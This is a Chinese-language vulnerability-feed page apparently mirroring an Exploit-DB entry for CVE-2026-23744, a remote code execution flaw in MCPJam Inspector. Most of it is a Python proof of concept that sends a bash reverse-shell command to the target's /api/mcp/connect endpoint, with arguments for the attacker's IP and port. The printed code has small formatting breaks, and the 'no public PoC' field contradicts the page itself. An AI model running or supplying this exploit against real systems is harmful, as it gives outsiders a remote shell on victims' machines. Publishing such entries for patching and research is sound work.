[webapps] MCPJam Inspector - Remote Code Execution

CVE-2026-23744

漏洞

High · CVSS N/A

📋 漏洞基础信息

CVECVE-2026-23744
漏洞类型漏洞
受影响版本详见原文
危害等级High · CVSS N/A
发布日期2026-07-07
提交者Diamorphine
来源Exploit-DB 原文 ↗

⚔️ 原始 PoC

# Exploit Author: Diamorphine


import asyncio
import httpx
import argparse
from urllib.parse import urljoin


async def main(attacker_ip,attacker_port,url):
    async with httpx.AsyncClient(verify=False) as client:
        data = {"serverConfig": {"command": "bash","args": ["-c",f"bash -i >&/dev/tcp/{attacker_ip}/{attacker_port}0>&1"],"env": {}},
"serverId": "Hello666"
        }ready_url = urljoin(url,"/api/mcp/connect")
        r = await client.post(url=ready_url,json=data)
        print(r.text)

parser = argparse.ArgumentParser(description="Exploit for CVE-2026-23744 MCPJam Inspector - Remote Code Execution")

parser.add_argument("-u","--url",required=True,help="Target host. e.g. http://127.0.0.1:8080")
parser.add_argument("-l",
"--lhost",required=True,help="Attacker ip")
parser.add_argument("-p","--lport",required=True,help="Attacker port")

args = parser.parse_args()

if __name__ == '__main__':
    asyncio.run(main(args.lhost,args.lport,args.url))

🛡️ 修复建议

请升级到厂商最新安全版本。

📎 参考链接

🚨 威胁评估

📈 EPSS 利用概率暂无数据
🚨 CISA KEV未被已知利用
🔧 公开 PoC暂无公开 PoC

⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-08-01 08:23 | 来源: Exploit-DB

[!] CONTACT_CHANNELS

如需商务合作、技术咨询或漏洞反馈,请通过以下离岸节点联系作者。

> PING_AUTHOR (@A1RedTeam)